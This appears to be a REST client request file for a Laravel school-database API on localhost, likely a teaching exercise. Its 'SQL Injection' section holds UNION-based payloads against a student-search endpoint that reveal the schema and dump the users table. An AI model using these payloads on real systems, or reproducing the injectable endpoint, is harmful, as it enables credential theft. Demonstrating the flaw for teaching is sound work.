### változók
@protocol = http://
@hostname = localhost
@port = 8000
@host = {{protocol}}{{hostname}}:{{port}}


# ------------  lekérdezése ---------
### get diaks
get {{host}}/api/queryOsztalynevsor
Accept: application/json

### get diak by nev
get {{host}}/api/queryOsztalytarsak/Anikó
Accept: application/json

### get diak by oldal
get {{host}}/api/queryDiakOldalankent/1/5
Accept: application/json

### get diak kereső by nev
get {{host}}/api/queryDiakKeres/Feri
Accept: application/json

# SQL Injection
### get mi az adatbazis neve
get {{host}}/api/queryDiakKeres/Feri" UNION SELECT DATABASE(), '', '', '', '', '', '', '', '', ''%23"
Accept: application/json
### get milyen tablaink vannak
get {{host}}/api/queryDiakKeres/Feri" UNION SELECT table_name, '', '', '', '', '', '', '', '', '' FROM information_schema.tables WHERE table_schema = 'laravel-iskola'%23"
Accept: application/json
### A user tabla oszlopai
get {{host}}/api/queryDiakKeres/Feri" union SELECT column_name, '', '', '', '', '', '', '', '', '' FROM information_schema.columns WHERE  table_name='users' AND table_schema = 'laravel-iskola'%23"
Accept: application/json
### A user tabla oszlopai
get {{host}}/api/queryDiakKeres/Feri" UNION SELECT *, '', '' FROM users%23"
Accept: application/json

# ------------  login, user ---------
### login
# @name login
POST {{host}}/api/users/login 
Accept: application/json
Content-Type: application/json

{
    "email": "test@example.com",
    "password": "123"
}

###
@token = {{login.response.body.user.token}}

### logout
POST {{host}}/api/users/logout 
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}


### get users
get {{host}}/api/users
Accept: application/json
Authorization: Bearer {{token}}

### get user by Id
get {{host}}/api/users/1
Accept: application/json
Authorization: Bearer {{token}}

### post user
post {{host}}/api/users
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}

{
    "name": "test3",
    "email": "test3@example.com",
    "password": "123"
}

### delete user by id
delete {{host}}/api/users/4
Accept: application/json
Authorization: Bearer {{token}}

### patch user by id
patch {{host}}/api/users/2
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}

{
    "password": "1234"
}

# ------------  teszt ---------
### teszt
get {{host}}/api/
# ------------ /teszt ---------

# ------------  sport ---------
### get sports
get {{host}}/api/sports

### get sport by id
get {{host}}/api/sports/2

### post sport
post {{host}}/api/sports
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}
{
    "sportNev": "111"
}

### delete sport by id
delete {{host}}/api/sports/13
Accept: application/json
Authorization: Bearer {{token}}

### patch sport
patch {{host}}/api/sports/9
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}
{
    "sportNev": "yyy"
}

# ------------  osztalies ---------
### get osztalies
get {{host}}/api/osztalies

### get osztalies by id
get {{host}}/api/osztalies/2

### post osztalies
post {{host}}/api/osztalies
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}
{
    "osztalyNev": "111"
}

### delete osztalies by id
delete {{host}}/api/osztalies/11
Accept: application/json
Authorization: Bearer {{token}}

### patch sport
patch {{host}}/api/osztalies/10
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}
{
    "osztalyNev": "10a"
}

# ------------  diaks ---------
### get diaks
get {{host}}/api/diaks

### get diaks by id
get {{host}}/api/diaks/2

### post diaks
post {{host}}/api/diaks
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}
{
    "osztalyId": 2,
    "nev": "Jenő",
    "neme": true,
    "szuletett": "2018-01-12",
    "helyseg": "Szolnok",
    "osztondij": "5000.00",
    "atlag": 3.5
}

### delete diaks by id
delete {{host}}/api/diaks/8
Accept: application/json
Authorization: Bearer {{token}}

### patch sport
patch {{host}}/api/diaks/9
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}
{
    "osztalyId": 20,
    "helyseg": "Abony"
}

# ---- sportolas ----
### get sportolas
get {{host}}/api/sportolas

### get sportolas by id
get {{host}}/api/sportolas/2/5

### post sportolas
POST {{host}}/api/sportolas
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}
{
    "diakokId": 6,
    "sportokId": 6
}

### patch sportolas
PATCH {{host}}/api/sportolas/2/7
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}
{
    
    "sportokId": 6
}

### delete sportolas by id
DELETE {{host}}/api/sportolas/6/6
Accept: application/json
Content-Type: application/json
Authorization: Bearer {{token}}
